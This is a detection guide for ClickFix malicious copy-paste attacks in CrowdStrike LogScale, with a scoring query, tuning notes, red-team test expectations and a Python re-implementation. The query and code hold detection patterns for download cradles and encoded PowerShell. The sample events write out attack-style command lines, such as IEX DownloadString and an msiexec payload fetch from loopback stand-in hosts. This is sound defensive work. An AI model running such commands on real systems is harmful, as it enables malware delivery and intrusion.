Detect Malicious Copy and Paste in CrowdStrike LogScale
Adversaries may rely upon a user copying and pasting code to gain execution (ClickFix). Victims are presented with fake error messages, CAPTCHA prompts, or troubleshooting instructions on malicious websites or in phishing emails that instruct them to open a terminal, Windows Run dialog, or command prompt and paste a pre-supplied command. The pasted command typically includes download cradles, encoded payloads, or inline scripts designed to establish a foothold on the victim machine. ClickFix bypasses email filtering, browser sandboxing, and file execution controls because the user themselves executes the payload. Threat actors including Contagious Interview (DPRK-linked), Havoc C2 operators, and Lumma Stealer distribution campaigns have heavily leveraged this technique against enterprise users.
MITRE ATT&CK
- Tactic: Execution
- Technique: T1204 User Execution
- Sub-technique: T1204.004 Malicious Copy and Paste
- Canonical reference: https://attack.mitre.org/techniques/T1204/004/
LogScale Detection Query

```logscale
#event_simpleName=ProcessRollup2
| ParentBaseFileName = /^(explorer\.exe|chrome\.exe|firefox\.exe|msedge\.exe|iexplore\.exe|brave\.exe)$/i
| ImageFileName = /\\(powershell\.exe|pwsh\.exe|cmd\.exe|mshta\.exe|wscript\.exe|cscript\.exe)$/i
| CommandLine = /(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\bIWR\s|\bcurl\s|\bwget\s|certutil.*urlcache|bitsadmin.*transfer|-EncodedCommand|-enc\s|FromBase64String|Invoke-Expression|IEX[\(\s]|javascript:|vbscript:|msiexec.*https?:|regsvr32.*\/i:https?:)/i
// Each indicator is scored 1 or 0 so the flags can be summed into ClickFixScore
| case {
    ParentBaseFileName = /^explorer\.exe$/i | RunDialogExecution := 1;
    * | RunDialogExecution := 0
  }
| case {
    ParentBaseFileName = /^(chrome|firefox|msedge|iexplore|brave)\.exe$/i | BrowserSpawn := 1;
    * | BrowserSpawn := 0
  }
| case {
    CommandLine = /(DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|certutil.*urlcache|bitsadmin.*transfer|\bcurl\s|\bwget\s)/i | DownloadCradle := 1;
    * | DownloadCradle := 0
  }
| case {
    CommandLine = /(-EncodedCommand|-enc\s|FromBase64String)/i | EncodedPayload := 1;
    * | EncodedPayload := 0
  }
| case {
    CommandLine = /(javascript:|vbscript:)/i | InlineScript := 1;
    * | InlineScript := 0
  }
| case {
    CommandLine = /(Invoke-Expression|IEX[\(\s])/i | InvokeExpression := 1;
    * | InvokeExpression := 0
  }
| case {
    CommandLine = /(msiexec.*https?:\/\/|regsvr32.*\/i:https?:\/\/)/i | RemoteExec := 1;
    * | RemoteExec := 0
  }
// Composite score: number of ClickFix categories the event matches (0-7)
| ClickFixScore := RunDialogExecution + BrowserSpawn + DownloadCradle + EncodedPayload + InlineScript + InvokeExpression + RemoteExec
| select([_time, ComputerName, UserName, ImageFileName, CommandLine, ParentBaseFileName, ParentCommandLine, RunDialogExecution, BrowserSpawn, DownloadCradle, EncodedPayload, InlineScript, InvokeExpression, RemoteExec, ClickFixScore])
| sort(field=[ClickFixScore, _time], order=[desc, desc])
```

Detects ClickFix / Malicious Copy-Paste (T1204.004) using CrowdStrike Falcon ProcessRollup2 telemetry. Identifies scripting interpreters (PowerShell, pwsh, cmd, mshta, wscript, cscript) spawned by explorer.exe or browser processes where the command line contains ClickFix indicators: download cradles (Net.WebClient, certutil, bitsadmin, curl), encoded payloads (-EncodedCommand, FromBase64String), inline execution (Invoke-Expression, IEX), inline scripts (javascript:, vbscript:), or remote installer execution (msiexec/regsvr32 over HTTP). Each event is scored 1 or 0 across seven behavioral categories, and results are sorted by the composite ClickFixScore for prioritized triage.
Data Sources
- Required Tables: ProcessRollup2 (CrowdStrike Falcon process execution telemetry)
False Positives & Tuning
- CrowdStrike Falcon sensor updates or CrowdStrike-initiated remediation actions that spawn PowerShell with download parameters under the Falcon agent context, which may surface explorer.exe as the effective parent in certain Windows process inheritance scenarios.
- Enterprise software vendors (e.g., Citrix Workspace, VMware Horizon) whose browser integration components spawn local PowerShell or script helpers from the browser parent process with connection configuration passed as encoded arguments.
- Legitimate software packaging workflows using tools like Chocolatey or Scoop where a developer pastes installation one-liners (e.g., Set-ExecutionPolicy Bypass -Scope Process -Force; iex ((New-Object System.Net.WebClient).DownloadString(...))) from vendor documentation into Run or a terminal.
- Security awareness training platforms that simulate ClickFix lure pages in controlled environments to test user susceptibility — these produce real execution events matching all ClickFix indicators.
Testing Methodology
Validate this detection against the following four Atomic Red Team tests. Each test lists the behaviour to exercise and the telemetry you should expect to see.
- Test 1: ClickFix Run Dialog PowerShell Download Cradle Simulation
Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing 'Net.WebClient', 'DownloadString', and 'IEX'. If executed via Win+R: ParentImage=explorer.exe, Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU containing the pasted command. Sysmon Event ID 3 (Network Connection) attempt to 127.0.0.1:8080 (connection refused, but event fires). PowerShell ScriptBlock Log Event ID 4104 with script content.
- Test 2: ClickFix mshta Inline JavaScript Execution
Expected signal: Sysmon Event ID 1: Image=mshta.exe, CommandLine containing 'javascript:' and 'ActiveXObject' and 'WScript.Shell'. Sysmon Event ID 1 child: cmd.exe spawned by mshta.exe with CommandLine 'cmd.exe /c echo ClickFix-AtomicTest > ...'. Sysmon Event ID 11 (File Create): %TEMP%\clickfix_test.txt. If via Win+R: Sysmon Event ID 13 (Registry Value Set) on RunMRU key.
- Test 3: ClickFix Base64-Encoded PowerShell via Run Dialog
Expected signal: Sysmon Event ID 1: Image=powershell.exe, CommandLine containing '-EncodedCommand dwBoAG8AYQBtAGkA'. If executed via Win+R: ParentImage=explorer.exe; Sysmon Event ID 13 (Registry Value Set) on HKCU\...\Explorer\RunMRU with the encoded command string. PowerShell ScriptBlock Log Event ID 4104 shows decoded content 'whoami'. The encoded value 'dwBoAG8AYQBtAGkA' decodes from UTF-16LE Base64 to 'whoami'.
- Test 4: ClickFix msiexec Remote Package Execution
Expected signal: Sysmon Event ID 1: cmd.exe with CommandLine containing 'msiexec /i https://'. Sysmon Event ID 1 child: msiexec.exe with CommandLine containing 'https://127.0.0.1:8443/clickfix-payload.msi' and '/qn'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:8443 (will fail, no listener). If run via Win+R: Sysmon Event ID 13 on RunMRU key.
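As an added example that is not part of this page or the CrowdStrike rule, the Python below re-implements the query's parent/image/command-line gates, the seven flags and the composite ClickFixScore over a few constructed ProcessRollup2-style events modelled on Tests 1, 3 and 4, and adds the UTF-16LE Base64 decode that Test 3 relies on to reveal 'whoami'. The query's command-line pre-filter is approximated as "at least one category matched"; PS_PATH and the sample events are assumptions.

```python
import base64
import re

# Hypothetical re-implementation of the LogScale rule above (added example, not the page's or CrowdStrike's code)
PARENT_RE = re.compile(r"^(explorer|chrome|firefox|msedge|iexplore|brave)\.exe$", re.I)
IMAGE_RE = re.compile(r"\\(powershell|pwsh|cmd|mshta|wscript|cscript)\.exe$", re.I)
CATEGORIES = {  # the rule's five command-line categories; the two parent-based flags are derived in score_event()
    "DownloadCradle": re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|certutil.*urlcache|bitsadmin.*transfer|\bcurl\s|\bwget\s", re.I),
    "EncodedPayload": re.compile(r"-EncodedCommand|-enc\s|FromBase64String", re.I),
    "InlineScript": re.compile(r"javascript:|vbscript:", re.I),
    "InvokeExpression": re.compile(r"Invoke-Expression|IEX[\(\s]", re.I),
    "RemoteExec": re.compile(r"msiexec.*https?://|regsvr32.*/i:https?://", re.I),
}
ENCODED_RE = re.compile(r"-(?:EncodedCommand|enc)\s+([A-Za-z0-9+/=]+)", re.I)

def score_event(event):
    """Apply the rule's gates (parent, image, at least one category hit); return the flags and ClickFixScore, or None."""
    parent, image, cmd = event["ParentBaseFileName"], event["ImageFileName"], event["CommandLine"]
    flags = {name: int(bool(rx.search(cmd))) for name, rx in CATEGORIES.items()}
    if not (PARENT_RE.match(parent) and IMAGE_RE.search(image) and any(flags.values())):
        return None
    flags["RunDialogExecution"] = int(parent.lower() == "explorer.exe")  # Win+R launches under explorer.exe
    flags["BrowserSpawn"] = 1 - flags["RunDialogExecution"]              # any other allowed parent is a browser
    flags["ClickFixScore"] = sum(flags.values())
    return flags

def decode_encoded_command(cmd):
    """Recover the script behind -EncodedCommand/-enc: PowerShell expects Base64 of UTF-16LE text."""
    match = ENCODED_RE.search(cmd)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid Base64/UTF-16LE, leave it to the analyst

def triage(events):
    """Score the events that survive the gates and order them by ClickFixScore, like the rule's sort()."""
    rows = [{**e, **s, "Decoded": decode_encoded_command(e["CommandLine"])} for e in events if (s := score_event(e))]
    return sorted(rows, key=lambda r: r["ClickFixScore"], reverse=True)

PS_PATH = r"\Device\HarddiskVolume1\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"  # assumed image path
SAMPLE_EVENTS = [  # constructed ProcessRollup2-style events modelled on Tests 1, 3 and 4, plus a non-matching parent
    {"ParentBaseFileName": "explorer.exe", "ImageFileName": PS_PATH,
     "CommandLine": "powershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://127.0.0.1:8080/x')\""},
    {"ParentBaseFileName": "explorer.exe", "ImageFileName": PS_PATH, "CommandLine": "powershell -EncodedCommand dwBoAG8AYQBtAGkA"},
    {"ParentBaseFileName": "chrome.exe", "ImageFileName": r"\Device\HarddiskVolume1\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c msiexec /i https://127.0.0.1:8443/clickfix-payload.msi /qn"},
    {"ParentBaseFileName": "svchost.exe", "ImageFileName": PS_PATH, "CommandLine": "powershell -EncodedCommand dwBoAG8AYQBtAGkA"},
]
```

Running `triage(SAMPLE_EVENTS)` ranks the Test 1 cradle first (score 3: Run dialog, download cradle, IEX), the encoded and msiexec events at 2, and drops the svchost.exe-parented event entirely.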
References
- https://attack.mitre.org/techniques/T1204/004/
- https://www.proofpoint.com/us/blog/threat-insight/security-brief-clickfix-social-engineering-technique-floods-threat-landscape
- https://www.reliaquest.com/blog/using-captcha-for-compromise/
- https://www.cloudsek.com/blog/unmasking-the-danger-lumma-stealer-malware-exploits-fake-captcha-pages
- https://blog.sekoia.io/clickfake-interview-campaign-by-lazarus/
- https://asec.ahnlab.com/en/73952/
- https://asec.ahnlab.com/en/85699/
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.004/T1204.004.md